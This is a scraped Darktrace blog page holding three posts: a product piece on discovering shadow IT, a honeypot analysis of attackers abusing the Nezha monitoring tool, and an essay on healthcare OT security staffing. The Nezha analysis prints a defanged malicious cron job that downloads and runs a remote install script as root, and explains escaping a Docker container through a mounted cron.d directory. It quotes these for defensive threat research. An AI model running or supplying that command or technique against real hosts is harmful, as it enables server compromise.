ブログ
/
Proactive Security
/
November 2, 2022

How Darktrace Identifies Shadow IT

Find out how Darktrace identifies and manages shadow IT. Gain valuable insights into detecting unauthorized IT activities within your organization.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dan Fein
VP, Product
Default blog image
02
Nov 2022

Darktrace was recently called into a situation where a department had set up an online questionnaire, which had been included in a newsletter to customers. They’d used a free version of the software and it had not been authorised by IT. 

The questionnaire requested some sensitive data from the respondents, but as there was no third-party contractor agreement in place, there was no agreement on data usage, storage, protection or maintenance. Unfortunately, the software provider had a security vulnerability in their solution, and this resulted in a massive data breach of the questionnaire answers – a situation that could have been avoided, had the organization been using Darktrace PREVENT.

This type of unauthorized usage is a common instance of the growing problem of shadow IT. Unlike formal IT, which is routed through an IT department closely involved in approving, setting up, and maintaining it, shadow IT falls outside of that team’s control. It is made up of systems – including cloud and SaaS applications – which the IT department are either unaware exist, or are unable to remove without disrupting workflows.

Because it lacks proper involvement from IT, shadow IT’s impact on a company’s overall security risk can be ill-defined, not least because it is difficult for many organizations to know how much of it exists within their digital estates. Full visibility over the digital environment, and every asset it contains, is necessary before the problem can begin to be addressed.

The reality is: shadow IT happens

Shadow IT crops up for a number of reasons. This is often employees taking steps to save time: having your IT team acquire and set up new infrastructure and software is important for managing security risks, but they necessarily take time. For some employees, the time taken to go through these formal channels is enough to push them to use shadow IT systems, which are generally quicker and cheaper to set up and begin using. It’s easier than ever, for instance, to spin up cloud IT environments. The pressure of completing projects within strict budgetary limitations may also tempt employees down this cheaper, but more hazardous path.

There is also a problem of business-led IT, whereby business decisions involving the use of new systems are made without consulting IT departments. Organizations should always look to adopt a security-first approach, because when business interests lead the way, IT teams can struggle to keep up, leading to the emergence of new vulnerabilities. In cases where these business decisions are intentionally hidden from the IT team, Shadow IT becomes a serious concern.

Reducing the effects of Shadow IT

In the end, security teams, particularly those charged with securing large organizations, will never entirely prevent employees from occasionally turning to unauthorized systems. They can, however, reduce the impact that these systems have on the organization’s overall risk landscape.

One way to do this is to reexamine the organization’s workflows. Try to identify which formal processes are unnecessarily cumbersome, forcing employees to work around them, and figure out whether they can be improved. When properly managed, formal adoption of the Shadow IT systems employees are already using can be an effective solution.

Improving workflows in this way will begin to help to address the problem, but it will not be the first step an organization takes in the fight against Shadow IT: first it must discover that it has a problem that needs solving, and this cannot be done until its security team uncovers the sheer amount of shadow IT lurking within the organization. The first step, therefore, is to find a way of obtaining total visibility over every system in the digital environment. 

The Power of Prevention

For years Darktrace has illuminated the assets silently lurking within an organization, and now Darktrace / Attack Surface Management is finally giving security teams a clear and complete view over the external attack surface of their digital estates, including all of the shadow IT they didn’t previously know about. It does so by continuously monitoring assets and connections on the attack surface for risks and vulnerabilities. On average, this process reveals 30-50% more externally-facing assets than were previously known to the organization’s IT team and, importantly, analyzes the respective risk posed by each. 

This information is visualized for the security team in a way which makes it simple to determine the ownership of each system and asset, and helps teams to prioritize those vulnerabilities which require the most attention. 

This was crucial recently for an organization that had just been hacked through a shadow IT website created by the marketing department, without the knowledge of the security team. The company immediately brought on Darktrace / Attack Surface Management (ASM) to increase their cyber resilience, and the technology identified 12 urgent vulnerabilities due to shadow IT and misconfigurations which allowed the company to plug those holes before a repeat event occurred.

But having a holistic understanding of the risks of shadow IT requires looking beyond the external attack surface. To this end, Darktrace / Proactive Exposure Management identifies and evaluates all of the attack paths which exist in an organization, and reveals unknown devices which may sit along them. These devices may prove to be components in the middle of critical attack paths leading to precious data or vulnerable assets, but Darktrace minimizes this risk by identifying them and assessing the risk they pose to the environment.

At another organization, Darktrace recently identified a disaster recovery domain controller that was supposed to be an exact replication of the production domain controller. Being a standby for the main domain controller, this device was not regularly monitored by the IT team. However, Darktrace continuously monitors assets within a customer’s environment and identified that, even though they should in theory be the exact same, the back-up domain controller had different potential damage scores due to a Microsoft patch failing to install. No one in the IT team had identified this risk, with Darkrtace identifying the need for patching before to avoid the vulnerability being exploited – and critical data falling into the wrong hands. 

From there, it’s up to security teams how they wish to proceed. Some systems and assets may pose too great a risk and will need to be closed off, while others, particularly those which are already widely used within the organization and can be easily secured by the IT department, may be allowed to stay. What matters, is that the ‘shadow’ of shadow IT – the element of mystery which makes these systems such a hazard to security teams – has been lifted. With full visibility over every system and asset, and a clear understanding of which ones constitute network vulnerabilities, security teams no longer need to live in fear of their own organization’s digital environments.

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dan Fein
VP, Product

Blog

/

Network

/

June 10, 2026

How Attackers Abuse the Chinese Nezha Monitoring Tool

Default blog imageDefault blog image

What is Nezha?

Nezha is an open-source tool that allows system administrators to centrally monitor multiple servers, including their resource usage such as CPU and network usage, and uptime. The tool also enables remote administrative access via an interactive shell.

The project has just under 10,000 stars on GitHub and has seen widespread adoption in the Chinese IT community, with many forum posts providing guides on installation and usage.

However, Nezha’s status as a legitimate executable that has remote access capabilities creates an opportunity for misuse. Instead of deploying a regular command-and-control (C2) implant, attackers can deploy Nezha directly on compromised hosts. As these deployments are functionally indistinguishable from legitimate installations, they can blend into expected operational tooling and evade detection.

Darktrace’s analysis of a Nezha infection

Darktrace operates several high-interaction honeypots to observe attacker techniques and behaviors. Darktrace analysts observed an intrusion against the Docker-based honeypot, initiated with a malicious container create command.

 The malicious container create command.
Figure 1: The malicious container create command.

Docker allows any host file or directory to be passed through to a container, granting read and write access. In this case, the attacker made use of this to pass through the cron.d directory, which is used to schedule recurring tasks, such as maintenance or backup commands.

These commands and timings are stored in the cron.d directory, which the attacker can now write to because it is passed through to their malicious container. By writing a job to this directory from within the container, the cron service running on the host detects the new job and executes it on the host, effectively allowing the attacker to escape the container.

The attacker the created a malicious cron job named ngk:
* * * * * root curl hxxps://file.gpu5[.]com/linux_install.sh | bash

This resulted in the host downloading and running the linux_install.sh file with root privileges.

The linux_install script installs several dependencies, sets up environmental variables, and retrieves a second-stage script (nezha_install.sh) from the same domain.

The linux_install script.
Figure 2: The linux_install script.

The nezha_install.sh script based on the official Nezha installer but has been modified to hard code configuration values, such as the server address, and to remove interactive prompts, allowing it to be installed without user input.

Open by design

One of Nezha’s most interesting design choices is that its main monitoring panel does not require authentication to view a list of monitored hosts. This exposes a list of compromised systems via the attacker-controlled panel, enabling direct observation of the operation’s scale, victimology and infrastructure.

The attacker’s Nezha dashboard.
Figure 3: The attacker’s Nezha dashboard.

At the time of analysis, the campaign had infected 141 servers, with 45 still online and accessible.  The number of online servers was previously higher, suggesting that some victims may have discovered and removed the infection.

The exposed dashboard provides insights into victim characteristics, including geographic distribution, hardware specification, and resource usage. Most infected hosts were low-spec systems, commonly one or two core Xeon CPUs and less than 4GB of RAM, indicating they were likely small virtual private servers (VPS) with limited value to the attacker.

Many systems also exhibited 100% CPU usage, which may indicate concurrent compromise, such as cryptocurrency mining activity by other threat actors.

Open-source intelligence platforms such as Shodan and Censys can also identify publicly exposed instances of Nezha. Although authentication is required to execute commands on a monitored server, visibility into dashboards still provides valuable intelligence for attackers and defenders alike.

At the time of writing, Darktrace identified 33 internet-facing Nezha installations as openly accessible.

Key takeaways

The abuse of legitimate software has become a consistent feature of modern intrusion activity, enabling attackers to operate without deploying traditional malware and reducing the risk of detection.

This creates a form of “trust inversion”, where tools typically associated with routine operations may instead indicate malicious activity when deployed outside expected contexts. Organizations should therefore prioritize asset visibility and software governance, ensuring that unexpected tool deployments can be identified and investigated, rather than focusing solely on malware-centric detection.

This challenge is especially pronounced in cloud environments, where legitimate monitoring tools may represent either essential software or an attacker backdoor. The scale and dynamic nature of cloud environments further complicate distinguishing between benign and malicious use.

Credit to Nathaniel Bill (Malware Research Engineer)
Edited by Ryan Traill (Content Manager)

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer

Blog

/

OT

/

June 9, 2026

Healthcare’s OT Cybersecurity Gap: Why Hospitals Must Make the Same Security Investments as Regulated Critical Infrastructures

Default blog imageDefault blog image

Rethinking the healthcare attack surface

When most people think about Operational Technology (OT) cybersecurity, they think about oil & gas pipelines, utilities, manufacturing plants, or power grids. However, hospitals & healthcare systems have quickly become a point of focus in the OT cybersecurity community as they do employ a variety of OT in the form of IoMT (Internet of Medical Things) networked devices such as: infusion pumps, imaging systems, patient monitoring equipment, laboratory systems, and traditional industrial control systems (ICS) in the form of smart building management systems (BMS) and even on site power generation control systems. 

These healthcare environments are no longer just traditional IT ecosystems, they are cyber-physical environments where disruption can directly impact patient care, operational continuity, and ultimately patient safety.

The OT cybersecurity expertise gap in healthcare organizations

Our research in the OT cybersecurity space revealed a concerning trend. Many hospitals and healthcare networks lack dedicated OT cybersecurity teams, OT security full time employees (FTE) and even OT expertise in the form of OT security certifications when compared to other critical infrastructure sectors.

On the other hand, within industries such as energy and manufacturing, we encounter more mature OT security programs that employ full time employees  dedicated to OT cybersecurity with OT security certifications and expertise to secure industrial and operational environments and lead investment in OT security processes and technology.

When reviewing the top 20 U.S. Hospitals by market cap, given what is publicly available on LinkedIn, only one FTE with an OT cybersecurity certification was found. The certifications that were searched for include: GIAC GICSP, GIAC GRID, GIAC GCIP and all ISA/IEC 62443 certifications. When replicating this same search across the top 20 utility providers in the US, 73 FTEs with OT related certifications were identified. As a control group, we looked within financial services, an industry NOT expected to have OT systems worth investing in FTEs to protect. However, the top 20 US financial institutions had 18 FTEs with OT related certifications. 

What these findings reveal

Overall, the findings regarding healthcare investment in OT security FTEs are surprising given how operationally dependent modern healthcare has become on OT. So why aren't hospitals investing in OT security personnel at the rate of peer critical infrastructures? It could just be lack of awareness; however, there are other, more plausible reasons.  

Based on historical trends in cyber incidents within the healthcare space, one could speculate that there is significantly greater likelihood of being victim to an attack that  focuses on extortion or data theft rather than an attack on specific OT systems. The amount of ransomware events incurred in healthcare, that historically do not target OT systems, may divert attention and security investment to the parts of the attack surface most likely to be targeted by ransomware. Additionally, data theft is a relevant threat objective for hospitals given PHI, PCI and PII, and data theft does not traditionally align with attacks targeting OT.  

However, with focused investment to address data theft and with adversaries new capability to string together chains of vulnerabilities of different severity scores using advancements in AI, we could be entering a threat landscape where adversaries pivot their tactics to target exposed and under protected devices and systems like OT. For example, although not a patient records database, predominant IOMT protocols HL7 and DICOM are unencrypted plaintext protocols and unless encrypted it is very simple for adversaries, who are sniffing traffic, to identify protected health information (PHI) in these communication protocols.

Why OT cybersecurity expertise can be effective for healthcare organizations

The convergence of IT, OT, and IoMT is already here, and threat actors are increasingly aware of the operational vulnerabilities that come with it. Additionally, as AI solutions such as agentic or generative applications are adopted and deployed, the attack surface will continue to change as permissions, and new connections will exist to support AI efficiency. From a cybersecurity standpoint, the reality is that many healthcare organizations are still working to establish consistent visibility and governance across their enterprise-connected devices and systems as their attack surface is changing in real time.  As the healthcare sector remains a significant target for cyber-attacks, hospitals would be well advised to begin addressing their operational environments OT as a critical component of their attack surface and invest in securing them first with people, then process and technology. 

What can healthcare organizations do to secure their OT

Including OT in current cybersecurity processes such as red teaming and testing incident response plans that take OT into account alongside building dedicated OT security capabilities including improving OT network visibility, leveraging OT network anomaly detection, micro-segmentation, and secure remote access will become essential steps in strengthening healthcare resilience. 

However, before any of the above processes or investments in technology can be made, these healthcare organizations, like the other critical infrastructure sectors, need to invest in the people with the experience in OT security to lead, implement, manage and audit the investment in OT cybersecurity technology and processes.  In cases where headcount cannot be added, investment in OT security certifications, such as the ones listed in this article, and participation on OT security events focused on practitioner training for existing cybersecurity employees can move the needle in terms of bringing OT expertise to the existing team.  

In an industry where uptime and safety are as mission critical as they are for a power utility, OT cybersecurity FTEs can no longer be viewed as optional for healthcare organizations and must become part of the foundation of modern healthcare cybersecurity strategy. 

[related-resource]

Continue reading
About the author
Daniel Simonds
Director of Operational Technology
あなたのデータ × DarktraceのAI
唯一無二のDarktrace AIで、ネットワークセキュリティを次の次元へ